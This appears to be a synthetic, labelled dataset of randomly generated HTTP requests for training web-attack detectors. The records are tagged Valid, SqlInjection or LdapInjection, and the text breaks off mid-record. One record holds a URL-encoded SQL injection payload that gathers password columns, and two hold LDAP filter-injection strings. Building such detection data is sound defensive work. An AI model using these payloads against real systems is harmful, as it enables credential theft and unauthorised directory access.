Range: 49-580233,702708-4982,-8
Referer: /oooas/hs6ire/lysxsD.mpeg
TE: trailers,trailers,trailers
Trailer: From
User-Agent: trAK (lBEccCqFP; oi1R2eI; iEE9hZrFn)
UA-CPU: MIPS
UA-Disp: 7018,7530,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 035x248
Via: HTTP/3.7 106.6.21.69:71
Transfer-Encoding: compress
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 479 www.eao96f.png "ldeigihLwAo78oeint" "Mon, 21 Dec 09 20:16:29 UTC"
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 13064
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44834
Start - Id: 7701
class: Valid
POST /eeraasatFietozs/TooLs/nZlFWzGKy.jpeg? HTTP/1.0
Content-Length: 55
Content-Language: k0iHt
Content-Encoding: identity
Content-Location: /edbha/h3eaH/aoeskls/Ooni/ilheNhe.css
Content-MD5: YWVzRXdzYmxtdW50ZWhGcA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 21 Sep 05 02:48:06 UTC
Last-Modified: Mon, 29 Nov 04 01:31:01 CET
Host: www.cicn.st
Connection: keep-alive
Accept: video/*, audio/basic;q=0.4, text/*;q=0.3
Accept-Charset: windows-1254;q=0.6, iso-8859-7;q=0.1, us-ascii, iso-8859-3, windows-1252
Accept-Encoding: *
Accept-Language: od-roizlwu, 5so-claoT1;q=0.9, muryu-l9Ai;q=0.7
Cache-Control: only-if-cached
Client-ip: 140.35.47.96
Cookie: tvll=986005;dinogson5zh=dla;e4tlnwdlpn=nrei0tas;eatws2h=0588259;eaaeuhp0pTnkmes=ticnrvd0efraMjn80s
Cookie2: $Version="2"
Date: Wed, 03 Feb 10 13:18:55 GMT
ETag: W/"A1nVorZshNYyfX_"
Expect: Ems0lbuh=ksittt;rlfgqax
From: hniei7@Uuezhotro.it
If-Modified-Since: Sat, 28 Mar 09 08:32:07 CET
If-Unmodified-Since: Tue, 19 Aug 08 06:06:49 GMT
If-Match: "VTcj90c6NkIvMZZd"
If-None-Match: "-BWqG-PFG3TSKi6oDHu4"
If-Range: *
Max-Forwards: 856
MIME-Version: 3.0
Pragma: aiw=ter
Proxy-Authorization: NTLM ZVNjaGhjZGlpM3VUUm95ZWUxcmVnQ2tpcG43OFpsZXJudGtyaW5u
Authorization: NTLM bXRlaG91YXRwS2R3amhvbDByQmF0b29sdGhUc3NDZXVlNGw1ZW90Y3R0YXR5bmll
Range: -3455,4046-20573,120388-4
Referer: http://hfeaad.biz/tusrdea/ii1h/el4e/e6oi/ohe9ldra.pl
TE: trailers,chunked,trailers
Trailer: Via
User-Agent: aki6vi7had/9.7.0.0
UA-CPU: Sparc
UA-Disp: 609,771,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 105x515
Via: s2efe/2.9 www.n9lsih3r.html, 8.8 www.heaiin.shtml:6679
Transfer-Encoding: 67uvQs
Upgrade: tiePoA/0.8, hIo/8.8, sMltc9/9.2
Warning: 298 49.117.1.87:98 "Nrrunl7neIh" "Thu, 09 Aug 07 17:28:09 UTC"
X-Forwarded-For: 49.121.77.5
X-Serial-Number: 5287621951731
----: ----------
~~~~~: ~~~~~~~~~~~~~~

04elrnOyr=nTnkp&alt=gecrlr9tendEa&finhfhnVoa=63&qLrh=eg

End - Id: 7701
Start - Id: 33429
class: Valid
POST /30K0ao1i@n/w6vP@6zlh9IMR/x7pZke/rsonielasOPis/dV/iNdsnfi/an7oift/ea/linghasmegY7osE1ntlr/tAH0xNnhgyMcSl/ui/iue6Cj.pl? HTTP/1.0
Content-Length: 250
Content-Language: edes,iT
Content-Encoding: gzip
Content-Location: /ylnoytbe/v9fce/veq5s/weSao5h.html
Content-MD5: eUxiMGZlZXd3bHRsc2V3bQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 05 Jun 08 20:22:44 CET
Last-Modified: Mon, 21 Jun 04 13:53:55 GMT
Host: 113.100.49.239:4529
Connection: keep-alive
Accept: text/plain;q=0.7, image/*
Accept-Charset: windows-1251, windows-1254;q=0.9, koi8;q=0.9, windows-1255;q=0.9, x-mac-icelandic;q=0.0
Accept-Encoding: compress;q=0.2, identity;q=0.7
Accept-Language: *;q=0.8
Cache-Control: min-fresh=03
Client-ip: 2.240.215.248
Cookie: efatss= eotkrr3w&hl\8=
Cookie2: $Version="9"
Date: Fri, 11 Apr 08 12:26:17 UTC
ETag: W/"9AwtjROacYQZB-UM"
Expect: 100-continue
From: airohua@gtscArwrS.org
If-Modified-Since: Tue, 13 Nov 07 16:56:39 UTC
If-Unmodified-Since: Sat, 03 Jul 04 02:44:12 CET
If-Match: "pCacP02KLTf2zQWfic"
If-None-Match: *
If-Range: Sat, 19 Sep 09 11:51:54 GMT
Max-Forwards: 639
MIME-Version: 5.1
Pragma: oe3r6a='ech'
Proxy-Authorization: NTLM bTdpbGVkaFByY3N1U3R0cmh0cmphcml0bHVlb2thdVRmOWVoYTNlckVoYW8=
Authorization: Digest cnonce="gnii"
Range: -1,44294-,-026414
Referer: /Tit1ga/r8ra/mnt8zeh/Nlnne5nq/loTso.pdf
TE: gzip,trailers,trailers
Trailer: Accept-Charset
User-Agent: nteu6ai/3.2.4
UA-CPU: StrongARM
UA-Disp: 326,087,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 669x659
Via: 2.5 57.156.53.51
Transfer-Encoding: sScs; inE0nm=jt7nkt
Upgrade: y2h0ia/4.9
Warning: 293 182.183.228.1 "tleicervnM3ra" "Mon, 29 Dec 08 19:13:38 UTC"
X-Forwarded-For: 229.236.129.140
X-Serial-Number: 538088947583493833
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~

MnHeoibeej9o=8hgiao&eEh5osaJa6HuIth=33&nnosnnyxqmeft=+>nr[&wpgthjiayisw5=iUTMkYE0&rTteo2uauqslj=512935&r5neaeiletlbi=o   yoEesa8c&acTenootdn8sp=?t&ntymc8heoodsn=gccteo34nqysn&cHYYvRBq=ma a1&irunsL &doDteeqd=1692&xhagMWdelete1W-=:Xohtacces

End - Id: 33429
Start - Id: 31798
class: Valid
GET /mne/T2ZmochaTPrz/swfi/CE/dc7gwvo/g_h62uh/eAtn3mimeeH1nNd.asp?nNot=iWXZ9d&hglo8=earlbn5eeo&apasswdnph-_oBOK=uB_M6.bSP&auyieiLmOO=N HTTP/1.1
Host: 211.255.57.226
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-greek;q=0.5, x-mac-japanese, x-mac-ce;q=0.4, x-mac-turkish;q=0.4, cp-932
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: ersi=4L
Client-ip: 121.31.252.223
Cookie: nbedUlegxracp=rriypennpadminiia;lR=%u=et;hhillc6gyh7ei=8276538153;-E.OkMJHO.y=pyqsDABKv
Cookie2: $Version="3"
Date: Mon, 24 Nov 08 12:36:36 CET
ETag: W/"lfyKD--OrA3HwQQN2HL"
Expect: 100-continue
From: dtdacndA@tAnldhs.uk
If-Modified-Since: Tue, 02 Oct 07 15:30:25 GMT
If-Unmodified-Since: Fri, 01 Jan 10 01:33:59 UTC
If-Match: "L8oNK6SttNRan.7SC9P"
If-None-Match: "Beh66uDNk4USpSKK"
If-Range: Tue, 03 Jul 07 03:52:24 GMT
Max-Forwards: 1
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic Y0FCdDpib3Ru
Authorization: st4wu hnr0r=yuise
Range: -4,-862
Referer: http://www.oemps.de/eapfy26/6Rezye.sh
TE: deflate;q=0.7,gzip;q=0.7
Trailer: Cache-Control
User-Agent: rrneIvt/8.7.6.1
UA-CPU: PowerPC
UA-Disp: 423,7753,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 540x2072
Via: 9.2 www.orrSsiay.js, 6.3 219.222.126.183:69120, 3.8 119.99.208.192
Transfer-Encoding: oea2
Upgrade: reCgm/1.9
Warning: 075 www.tgj5brs.htm "nOEloag30nqnokrne7lo" 
X-Forwarded-For: 99.24.216.147
X-Serial-Number: 995299594
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31798
Start - Id: 11010
class: Valid
GET /rcka/kF/xTnBerctne/h4ieirjmihzytrsgaCtL/vbscript2/Dao/t@2oa0pXX/ePDOBQ3LkyI3d/5x.03p8/uejttba5me/trayhI/Gmaild21atoCiFgp.js? HTTP/1.0
Host: 244.132.76.21
Connection: reetat
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=00778
Client-ip: 102.97.73.215
Cookie: tWaEibsaIdinte=sel47Aeodta;barisnAnvpr=97524784;8wsetutasbtie=r2CgausDa@J
Cookie2: $Version="17"
Date: Sun, 04 Jan 04 16:51:53 UTC
ETag: "9zaHIlbRk0sS1PMR"
Expect: aoitsr=Ai0ma
From: aewoeu@ihehwo.net
If-Modified-Since: Fri, 24 Nov 06 07:22:17 GMT
If-Unmodified-Since: Sun, 14 Feb 10 07:05:14 GMT
If-Match: *
If-None-Match: "SEXB1EMGZeUo_OkAXm"
If-Range: "dE6vljLZxQSoOkcJ"
Max-Forwards: 6421
MIME-Version: 9.8
Pragma: h43Ymlla='vta'
Proxy-Authorization: ayTqd ipelosnh=nhw7hz
Authorization: Basic ZWxuODllYXM6dG9vZg==
Range: 088577-,4710-50
Referer: http://oHittz.biz/eenT7/ztjdan/eAfe.css
TE: gzip,trailers,trailers
Trailer: Date
User-Agent: Mozilla/1.3 (X11; U; Open BSD i586 3.5; dh-U5; rv:9.5.0) Gecko/59140385
UA-CPU: x86
UA-Disp: 618,722,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 124x705
Via: HTTP/6.5 www.escO.jpg
Transfer-Encoding: compress
Upgrade: lhnj/8.6, tEe/2.7, nte/7.2
Warning: 404 55.233.111.251 "hwzpimntn" 
X-Forwarded-For: 187.124.141.113
X-Serial-Number: 109708230731
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11010
Start - Id: 22807
class: Valid
GET /oeAdO8aeA/st2GN.htm?bjw1ueh=e%3F+&IOhOF8connectV0H=l&tcs=eif+dtogita2w3ad2+&pXhela8dyvjn=+iew&rtntjitn=D6twOaxoTWtiae&labtlerwy=9174228263&Tg0yi=%5D&tsde6bbre=100&Fgroup bypv=99933&1f3rxebo=066&ueunzaqtlign=pO1mKwYdi&Lrxsaa=71&olWnw=0700241&80wMwqK-C.Y=Ai%28 HTTP/1.0
Host: www.igkente9.fr
Connection: 2Ffir
Accept: */*
Accept-Charset: iso-2022-jp;q=0.3, gb2312;q=0.2, windows-1255, iso-8859-7, hz-gb-2312
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 173.3.239.168
Cookie: lteeen=72;s7Eivcr=3
Cookie2: $Version="219"
Date: Tue, 22 Mar 05 24:46:49 UTC
ETag: W/"kZqhg2QPSpMR_v2"
Expect: 100-continue
From: nlnp08u@getmfm7tT.fr
If-Modified-Since: Mon, 16 Jan 06 09:31:14 CET
If-Unmodified-Since: Mon, 12 Jul 04 12:03:34 CET
If-Match: "-BQ1_1vr4nGnuKuP4Cn"
If-None-Match: "@Q.PZOv8ZUOlLOH"
If-Range: Fri, 27 Jun 08 07:45:34 CET
Max-Forwards: 88
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: NTLM cnJvbmhocDhlZXhpRVN0MW5vZWk5Y21wdGF0Z3RjYXdldDR3ZQ==
Authorization: NTLM U3RhZXNjbzlyZWVhYnpyb2FFem9uaGVlaW5lTHJkbTdhbjVtbnRlbG5o
Range: -637
Referer: /6Uhtap/eusbrhHt.ace
TE: chunked,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.4 (Machintosh; U; PPC Mac OS X 9.6; ef-uz; rv:2.1.1) Gecko/57820850
UA-CPU: 68000
UA-Disp: 335,445,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 612x9972
Via: HTTP/2.1 www.bliv5Es.tiff
Transfer-Encoding: compress
Upgrade: nlNDj/4.6
Warning: 552 www.2namiaEo.jpg:01754 "eaywa5bed" 
X-Forwarded-For: 143.162.53.229
X-Serial-Number: 3049600663
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22807
Start - Id: 2536
class: Valid
GET /ihe/5wKnc/lQ1sFe5/6libubua754htaccesand/beacso/mHT0lKy/d_PvOPIY/xtermq/_Qg-Ue.asp?t9o=c0np4aDts&ad9ishdmaismWs=1346744125&xsdtysh5gm=3046&H4likeinsertUJMservicesRZtR=-febaesock_stream&tpeirrBhaentub=gvpmossro7&0iPo9iMetxiua=04Hn&xduieeuo=iaoalinkoe5qe&p3z=pI%3B&anNsietd=ekIsWe&ciaptoehpLmj=++%3Bt%3E&ds8rs=nbayn&mi0niealE6a=80582 HTTP/1.1
Host: 7.132.226.243
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesetrad, windows-1252;q=0.3, big5, macintosh, x-mac-arabic
Accept-Encoding: deflate, deflate, identity;q=0.9, gzip
Accept-Language: *
Cache-Control: max-stale=26
Client-ip: 203.111.135.37
Cookie: Emizsr=dtfnc
Cookie2: $Version="527"
Date: Sun, 25 Jan 04 11:51:16 UTC
ETag: W/"CGtJpAfe3oXQUIVHoSX"
Expect: 100-continue
From: nnxgy@Ttnc1ez.uk
If-Modified-Since: Fri, 10 Apr 09 15:59:10 UTC
If-Unmodified-Since: Wed, 14 Oct 09 07:33:07 CET
If-Match: "LEVpb1wyOmhDmKg--7mh"
If-None-Match: *
If-Range: Wed, 21 Jan 09 14:15:29 CET
Max-Forwards: 4250
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Digest uri=/tlsstete/Eaolaro/6wsnstto.shtml
Authorization: Basic ZWNvdHA6ZWVrbkVlcw==
Range: 83-5
Referer: http://www.asljsthd.net/hrcAd/p9eso2h3/senttgti/0guraDns.nsf
TE: deflate;q=0.0
Trailer: Referer
User-Agent: ytrCeoprt5tgf
UA-CPU: MIPS
UA-Disp: 284,569,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 266x8527
Via: 1hfhr/3.2 www.ev1ee.css, FTP/2.8 www.i0suo3.png:3915
Transfer-Encoding: gzip
Upgrade: bae/3.4
Warning: 301 www.naet.js "Hsh2meee5a" "Sat, 22 Apr 06 15:10:43 UTC"
X-Forwarded-For: 8.183.220.41
X-Serial-Number: 37492980490
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2536
Start - Id: 42388
class: SqlInjection
GET /fv8LKxUZ/ifU8@WDL/uendu/hQsUZX4@Y85_/Gdv50sOSg/tfbnioXa/cEn6og/o8ndut2ti5ncoiushstS/pWicdRe.php?eemnetaoyh=%27%3B++begin+declare++++%40ret++++varchar%288000%29+set++%40ret%3D%27%3A%27+select+++++%40ret%3D%40ret%2B%27+%27%2Bhieot%2B%27%2F%27%2Bpassword+++from+++++sedOfn3+++++where+atrn%3E%40ret++select+%40ret+++++as++ret++into++foo+++++end-- HTTP/1.0
Host: www.muatI7igo8.gov
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: no-transform
Client-ip: 173.58.91.50
Cookie: hMmihrnnHiimS=weaziugd9ol8uiie;f5nimdd3=o T;tlLxui=1JbQZOX0bwr6;shetae6rhErs=7804
Cookie2: $Version="2"
Date: Wed, 09 Dec 09 06:49:50 CET
ETag: "6aYSx7Qj5t_MiM6u6aEP"
Expect: 100-continue
From: nU8g@Ctnnlleoe.st
If-Modified-Since: Sun, 08 Apr 07 07:11:58 CET
If-Unmodified-Since: Wed, 19 Jul 06 06:21:51 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 44
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM SW5vdWN0c2hQbnJvbmFldGFwbnBhYWszdXNhdGhvZGlnY3J5
Range: -012964
Referer: /iatp/Wl1dA/nlxfyeh/rt6aeyla/dnvirltj.php4
TE: trailers,deflate
Trailer: Warning
User-Agent: eaoisTccl (sfZyGFAsqT; srN68dUDNm; ygluouz)
UA-CPU: StrongARM
UA-Disp: 8289,132,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3589x325
Via: 6.5 15.102.10.152, FTP/3.7 31.11.82.172, 6.4 www.3eztIizt.htm
Transfer-Encoding: deflate
Upgrade: rse/1.1, o5mn/7.6, zlr3/8.8, or7Eaa/3.4
Warning: 999 147.111.219.75 "f2re1Ss" 
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 42388
Start - Id: 6385
class: Valid
POST /vuvlR@9JTyzR265-O/yesree8fboaeqoqtmib/n_rFxLCkmnqXXtJ0O8hS/xzgOl3g5j6UUDl5Rd3/miTeA/t5oeafeetl/s.ZbpQrc/rouaSwtbAetoDd4e/d6/mU8on0OAqjdvqxpa.htm? HTTP/1.0
Content-Length: 198
Content-Language: Tb,6hNiyeh
Content-Encoding: identity
Content-Location: http://www.4hinhar.st/rcDiha9/rnjlsof/ptlrNr9h/clouehnb.mpeg
Content-MD5: VWxoNHJodHMyYXRoZGlrVw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 27 May 09 07:55:58 CET
Last-Modified: Fri, 12 May 06 03:20:15 GMT
Host: www.rgei9s.de
Connection: keep-alive
Accept: application/rtf, application/*;q=0.1, video/*;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: gzip, compress
Accept-Language: *
Cache-Control: lehhe='Oyi6tml'
Client-ip: 113.133.52.70
Cookie: oovacone7aU4o=eam5-;cvmgfelen=a9aN1esak
Cookie2: $Version="01"
Date: Fri, 22 Dec 06 09:51:41 UTC
ETag: "GeadtqpgChYvdpC"
Expect: uUAn
From: 2wd8O@tldltfa.biz
If-Modified-Since: Thu, 22 May 08 11:56:45 UTC
If-Unmodified-Since: Sat, 01 Jul 06 18:26:36 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 07 Jul 06 17:21:29 GMT
Max-Forwards: 6
MIME-Version: 2.4
Pragma: nsbDi='oul'
Proxy-Authorization: Basic cnJzdWRpaDpzN3RuZXU=
Authorization: Digest nonce
Range: -2130,41850-44978
Referer: http://www.atimd.it/wzt9h.mpeg
TE: trailers,deflate,chunked
Trailer: Accept-Charset
User-Agent: tnoellkgst
UA-CPU: MIPS
UA-Disp: 131,664,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 4815x4543
Via: HTTP/7.8 www.s4S2tNdr.tiff
Transfer-Encoding: identity
Upgrade: senIyc/2.5, Chowao/4.4
Warning: 328 3.138.213.144 "lmuOhocahea5tEu" 
X-Forwarded-For: 211.154.68.138
X-Serial-Number: 10020198390
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

OEaaAknmdnRme=15434&rluoretteyeU=winntt'/i&V0JexecaW34e=nrahseeertdc&eisEso=aNx7JGP&oL=798522696&dgyLfhvp=ttIyZ&stGseeAydtU46a=;8rtg'SenluHgbb&icm7tndgedqt=32&edf=o&h7oerEoEetl9ig=fhtsnOrloe

End - Id: 6385
Start - Id: 38525
class: LdapInjection
GET /ekacW@2WcjwR0/dzrdephf7ol/Dix.cfm?oepset=%29%28++%7C++%28+cn%3D*o++%27brien*+%29%28mail+%3D*o+++%27brien*+%29+++&edSieSgu0xbcaee=kOey5k&mcgSpszgUAU0=neUcgwgetEanehnRe&RtIRnn3lctsz=6103&mv66atdpSuh=89073963&araHcmha=48995&kc2enl=hmeta&igQFWE=CmiXras6p1&ls9dugbh=ca&mtrat6ehu4=gtDaOi&nseoHirtnodZct=1nAPd9M%40Vv HTTP/1.1
Host: 109.39.212.140
Connection: keep-alive
Accept: application/*;q=0.9, text/xml
Accept-Charset: iso-10646-ucs-2;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 127.100.106.138
Cookie: teeuospl=>e ;6w=~nl;e6cuneiesma=tz0VQVaZV;nefnt2eVuta=i.4uZZB
Cookie2: $Version="13"
Date: Sun, 16 May 04 08:46:57 CET
ETag: W/"6cabhDopjWR86jSj8-"
Expect: lsfu4ai=3wee;e2mko=metMe
From: tubi@0dr5so.de
If-Modified-Since: Thu, 19 May 05 04:33:52 UTC
If-Unmodified-Since: Wed, 09 Mar 05 16:23:56 UTC
If-Match: *
If-None-Match: "qZ_T8Gy3tgGXF-gmB"
If-Range: *
Max-Forwards: 702
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ue6yrirt"
Authorization: Basic cmhoQTppa2xpaG9l
Range: 548411-,-37195
Referer: /bCcnnttN/nnR1Trd1/ioeOe.tiff
TE: deflate;q=0.3,gzip
Trailer: If-Range
User-Agent: Mozilla/7.0 (compatible; Konqueror/4.7; Solaris; reSruoea0e; d3uMmmt; nsi6nst)
UA-CPU: MIPS
UA-Disp: 8582,573,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8726x4401
Via: 3.7 77.254.115.145, 1.0 150.49.36.91
Transfer-Encoding: identity
Upgrade: piFi/9.7, A4e1/7.0, 7lsnih/3.7
Warning: 149 www.nAoht.css "snts" 
X-Forwarded-For: 101.186.114.243
X-Serial-Number: 30599
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38525
Start - Id: 22872
class: Valid
GET /eEEmAy-/ksamLxIX.AcateQbC8G.gif? HTTP/1.1
Host: www.tws0o5a.cz
Connection: keep-alive
Accept: video/quicktime;q=0.1, audio/x-wav;q=0.9, image/png
Accept-Charset: x-mac-ce;q=0.2
Accept-Encoding: identity;q=0.5, deflate;q=0.0, identity;q=0.8, compress;q=0.9, identity;q=0.9
Accept-Language: nnenP-rNa2rap;q=0.7, ti-7tr, ird4eila-7, yttxfee-t
Cache-Control: min-fresh=3
Client-ip: 104.220.169.167
Cookie: eeae=t1in\Oo(rai;gOX2_tnEa5ZJ=nMI5GlNPb;anlfeeuroa=4
Cookie2: $Version="80"
Date: Mon, 23 Apr 07 14:41:42 UTC
ETag: W/"6nKcYtlxwrlR7G10i6h"
Expect: eoevCite
From: geepN@1aanT.ch
If-Modified-Since: Thu, 22 Jul 04 23:44:42 GMT
If-Unmodified-Since: Tue, 17 Jun 08 24:18:09 CET
If-Match: "btmgPkWuEbX1JhJ"
If-None-Match: *
If-Range: "1Wi56sPd5H0Kzj2o"
Max-Forwards: 165
MIME-Version: 6.6
Pragma: msdrsdng='iIidstTm'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest realm
Range: -78,325-,-890033
Referer: /07t8.jpg
TE: deflate
Trailer: Accept
User-Agent: Mozilla/6.0 (compatible; MSIE 5.5; Open BSD i386; enaOHnf1; sUntt)
UA-CPU: StrongARM
UA-Disp: 533,0632,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 134x6878
Via: FTP/6.5 www.yIutaami.htm:38895
Transfer-Encoding: identity
Upgrade: 6ahich/9.0, ixit/2.6
Warning: 312 56.128.98.138 "curonnltfRimjCnt" 
X-Forwarded-For: 68.104.33.155
X-Serial-Number: 7097539555408147
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22872
Start - Id: 21307
class: Valid
GET /.Djy5DPsFccmdOSwp-1/oNIp7p6moat44JTaeE/n@jmjPLQibE.cgi?1rE=waeemn0%26&teshutaoth=d8%3C%28%5Ctts%3F&ofv=1755602&grhyuocdtder=684&euueuneveieciko=3136355215&rz1djaoausmla=itylf%3Dnm7e97i&mo3dea3ntenrw=winntshttps&null9tmptelnetXr=4&4el=uecho%24+&8Ninto5tweaY=9166740990&DkeYecrin=aEreaeel8d HTTP/1.1
Host: 169.185.136.208
Connection: 2sgin
Accept: application/rtf;q=0.6, audio/x-wav;q=0.5
Accept-Charset: *
Accept-Encoding: gzip;q=0.4, deflate
Accept-Language: *;q=0.3
Cache-Control: max-age=067
Client-ip: 130.22.25.249
Cookie: mqerm2=6800265;HNHechoZ2O1G=21952831;Opohh6d=oqn7e7rvea7eiufrph;eeluIahpwnw=230918280
Cookie2: $Version="8"
Date: Tue, 14 Apr 09 16:50:11 UTC
ETag: "VQfLFIu_RZQEkke2ut"
Expect: mSfnoate
From: aMuwze@s4ddbiH.ch
If-Modified-Since: Tue, 09 Feb 10 14:34:20 CET
If-Unmodified-Since: Thu, 11 Jun 09 09:59:42 UTC
If-Match: "mVb2xtgQ-h_pIWZEsdi"
If-None-Match: "Pctx@PeENZZ@@CY"
If-Range: "aNCx3SYeUlSwB..0Pj"
Max-Forwards: 7
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM cWk4eXZidG5pQXRsbm5saGRkZWVPeWViQXJhZGE3dDVpb3RwZXA=
Authorization: NTLM b29vc3lQdHV0R1RmeW90ZHRyb3RvZWVmZTh5dFhlYnBSbg==
Range: 863-
Referer: /okAs/kjmseiRr.nsf
TE: chunked;q=0.7,trailers,gzip;q=0.2
Trailer: Trailer
User-Agent: 13ogxeSWr http://www.v5ye.it
UA-CPU: PowerPC
UA-Disp: 698,349,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6998x4175
Via: 9.8 230.134.45.51, HTTP/5.4 www.nitboesa.html
Transfer-Encoding: deflate
Upgrade: tymurm/5.9, hhlRo/9.6, b96s/9.5
Warning: 068 130.32.170.22 "JiRda6nilonsravRtv" 
X-Forwarded-For: 8.50.17.22
X-Serial-Number: 2418413
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21307
Start - Id: 36925
class: LdapInjection
POST /yAVybgsoundIKupdateYJtmpO/.J6/vO9vbCs_.SqLLvn6/hi_4Z4WGAzZx@zC0yAT/tm3ehyg/oRVEp-1eZ75EbBP4W_m/i7.shtml? HTTP/1.0
Content-Length: 164
Content-Language: fhem
Content-Encoding: compress
Content-Location: /m9asOaa.mspx
Content-MD5: eGRzYWhyYW4xeWlsYzQ5RQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 Dec 09 03:05:51 UTC
Last-Modified: Mon, 06 Sep 04 09:27:29 GMT
Host: 44.32.181.122:80
Connection: oIsHrN4
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: aPtm-mltoc, onxro-nnvYIpE, d3tRfcpr-boow;q=0.2, Setomge-esde1ahl;q=0.9, ai-3pee;q=0.2
Cache-Control: no-cache
Client-ip: 162.232.160.26
Cookie: demOoomh=h@bEREJD;eeh2c=93;QrBnys=crrphap~&is;ha0duria67i=O4aeformAr;toErAefla=[r2uiuit
Cookie2: $Version="08"
Date: Tue, 19 Feb 08 13:37:21 UTC
ETag: W/"d7Bmeqt30DrvtRfk"
Expect: 100-continue
From: dhafadn@folsiatle.com
If-Modified-Since: Tue, 08 Feb 05 17:14:06 CET
If-Unmodified-Since: Sun, 11 Jan 09 16:12:18 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8923
MIME-Version: 5.9
Pragma: OecrGjt=kae9ne
Proxy-Authorization: NTLM cmVlZXRyZWdpYWJlb3N0ZUFPdGd6bm85Ym5jbndpdG5jc2Vxc2J1YVNlcg==
Authorization: se3C0o sr7foR1d=41oeem
Range: 561483-,67-,02097-305
Referer: /rtps4jgf/1s1r/TcOv7oe7/9thWsrss/GcEss.php4
TE: deflate,chunked,gzip;q=0.6
Trailer: Accept
User-Agent: 7UZpFqe-K http://www.itusAesa.de
UA-CPU: Sparc
UA-Disp: 0609,6015,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 015x0585
Via: HTTP/5.3 www.ensto.tiff:56, 4.4 50.251.208.228
Transfer-Encoding: gzip
Upgrade: ejsf/1.7, lxAe/6.8, 3Tuete/5.0
Warning: 591 www.lalfoh.gif "ed6niocL" "Fri, 23 Feb 07 23:24:32 CET"
X-Forwarded-For: 189.182.231.41
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

0aneus=7G4cq7ruCeu2&fedaytipoevc=5801&mDls=172&nmoPXrna4=eierwrf&WSYN7s.=)(    |(displayName=had*)   (name    =    had* )(    mail=had*    )

End - Id: 36925
Start - Id: 2066
class: Valid
GET /XrD86/uWj9/ignn/cbgtxf4AaoWd/3jGvJ-sYm/nnerrwe9Rnand19nkn9/ni.png? HTTP/1.1
Host: 115.226.142.130
Connection: i0tisioa
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: nat-ri;q=0.9, T-y;q=0.3, weic-Bbgd, dneW6on-F, nrta9-tfT
Cache-Control: only-if-cached
Client-ip: 160.70.47.198
Cookie: QBaZlink=1457805908;mow=Fo;prsnohSasl=usr706irihrlsor;uo7ee5eiA=lehsaibnre;;ePArasdUfLhmcs=nphp;fnipoi01ioMueie=gFoIQBKz
Cookie2: $Version="2"
Date: Fri, 05 Jan 07 17:35:02 UTC
ETag: "CqKJhzj3js0ETbABe"
Expect: lprt=6hOebism;raxsl
From: wDshh4eU@hl5stetee.com
If-Modified-Since: Fri, 07 Dec 07 24:00:40 UTC
If-Unmodified-Since: Wed, 14 Jan 09 05:27:17 UTC
If-Match: "eLOhbSt9teIsT7m@BcL"
If-None-Match: *
If-Range: Tue, 23 Nov 04 14:02:19 CET
Max-Forwards: 6180
MIME-Version: 1.2
Pragma: tmrcncsw=eUo0
Proxy-Authorization: sgUhr eKit=0iDeacaT
